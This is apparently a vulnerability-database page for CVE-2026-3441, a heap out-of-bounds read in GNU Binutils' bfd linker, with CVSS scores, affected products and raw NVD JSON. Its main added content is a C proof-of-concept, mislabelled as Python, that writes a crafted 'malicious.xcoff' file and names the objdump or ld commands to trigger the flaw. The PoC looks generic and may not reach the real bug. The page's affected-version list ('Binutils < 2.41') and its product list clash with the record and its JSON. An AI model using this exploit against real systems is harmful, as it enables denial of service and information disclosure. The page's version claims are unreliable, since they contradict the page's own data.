CVE-2026-3441

Description

A flaw was found in GNU Binutils. This heap-based buffer overflow vulnerability, specifically an out-of-bounds read in the bfd linker, allows an attacker to gain access to sensitive information. By convincing a user to process a specially crafted XCOFF object file, an attacker can trigger this flaw, potentially leading to information disclosure or an application level denial of service.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:* - VULNERABLE

GNU Binutils < 2.41 (bfd linker)

GNU Binutils < 2.40.1 (security update)

Red Hat Enterprise Linux 8/9 (binutils packages)

Fedora 38/39 (binutils packages)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * CVE-2026-3441 PoC - Malicious XCOFF File Generator
 * This PoC generates a specially crafted XCOFF file that triggers
 * an out-of-bounds read in GNU Binutils bfd linker.
 * 
 * WARNING: For educational and research purposes only.
 * Do not use for malicious purposes.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#pragma pack(push, 1)

// XCOFF File Header (FILE Header)
typedef struct {
    uint16_t f_magic;      // Magic number (0x01DF for 32-bit XCOFF)
    uint16_t f_nscns;      // Number of sections
    uint32_t f_timdat;     // Time and date stamp
    uint32_t f_symptr;     // File pointer to symbol table
    uint32_t f_nsyms;      // Number of symbol table entries
    uint16_t f_opthdr;     // Optional header size
    uint16_t f_flags;      // Flags
} XCOFF_FILE_HDR;

// XCOFF Section Header
typedef struct {
    char s_name[8];        // Section name
    uint32_t s_paddr;      // Physical address
    uint32_t s_vaddr;      // Virtual address
    uint32_t s_size;       // Section size
    uint32_t s_scnptr;     // File pointer to raw data
    uint32_t s_relptr;     // File pointer to relocation
    uint32_t s_lnnoptr;    // File pointer to line numbers
    uint16_t s_nreloc;     // Number of relocation entries
    uint16_t s_nlnno;      // Number of line number entries
    uint32_t s_flags;      // Flags
} XCOFF_SCN_HDR;

#pragma pack(pop)

int main(int argc, char *argv[]) {
    const char *output_file = "malicious.xcoff";
    FILE *fp;
    
    XCOFF_FILE_HDR file_hdr;
    XCOFF_SCN_HDR scn_hdr;
    
    // Initialize file header with malicious values
    memset(&file_hdr, 0, sizeof(file_hdr));
    file_hdr.f_magic = 0x01DF;  // 32-bit XCOFF magic number
    file_hdr.f_nscns = 1;       // One section
    file_hdr.f_timdat = 0x60000000;
    file_hdr.f_symptr = sizeof(XCOFF_FILE_HDR) + sizeof(XCOFF_SCN_HDR);
    file_hdr.f_nsyms = 0;
    file_hdr.f_opthdr = 0;
    file_hdr.f_flags = 0x0000;
    
    // Initialize section header with crafted values
    memset(&scn_hdr, 0, sizeof(scn_hdr));
    strncpy(scn_hdr.s_name, ".text", 8);
    scn_hdr.s_paddr = 0x1000;
    scn_hdr.s_vaddr = 0x1000;
    scn_hdr.s_size = 0x1000;    // Large section size
    // Malicious: s_scnptr points beyond allocated buffer
    scn_hdr.s_scnptr = 0xFFFFFFFF; // Out-of-bounds pointer
    scn_hdr.s_relptr = 0;
    scn_hdr.s_lnnoptr = 0;
    scn_hdr.s_nreloc = 0;
    scn_hdr.s_nlnno = 0;
    scn_hdr.s_flags = 0x20;     // STYP_TEXT flag
    
    // Write malicious XCOFF file
    fp = fopen(output_file, "wb");
    if (!fp) {
        fprintf(stderr, "Error: Cannot create output file\n");
        return 1;
    }
    
    fwrite(&file_hdr, sizeof(file_hdr), 1, fp);
    fwrite(&scn_hdr, sizeof(scn_hdr), 1, fp);
    
    fclose(fp);
    
    printf("[+] Created malicious XCOFF file: %s\n", output_file);
    printf("[+] Use 'objdump -x %s' or 'ld %s' to trigger vulnerability\n", 
           output_file, output_file);
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3441
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3441
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3441/
[4] VulDB https://vuldb.com/cve/CVE-2026-3441
[5] https://access.redhat.com/security/cve/CVE-2026-3441
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2443826

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3441", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:47.447", "lastModified": "2026-03-20T18:24:05.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in GNU Binutils. This heap-based buffer overflow vulnerability, specifically an out-of-bounds read in the bfd linker, allows an attacker to gain access to sensitive information. By convincing a user to process a specially crafted XCOFF object file, an attacker can trigger this flaw, potentially leading to information disclosure or an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en GNU Binutils. Esta vulnerabilidad de desbordamiento de búfer basado en montículo, específicamente una lectura fuera de límites en el enlazador bfd, permite a un atacante obtener acceso a información sensible. Al convencer a un usuario de procesar un archivo objeto XCOFF especialmente diseñado, un atacante puede activar esta falla, lo que podría llevar a la revelación de información o a una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:*", "matchCriteriaId": "70CA109B-85B9-4EF2-9A5F-A7D12F6EA878"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-3441", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443826", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}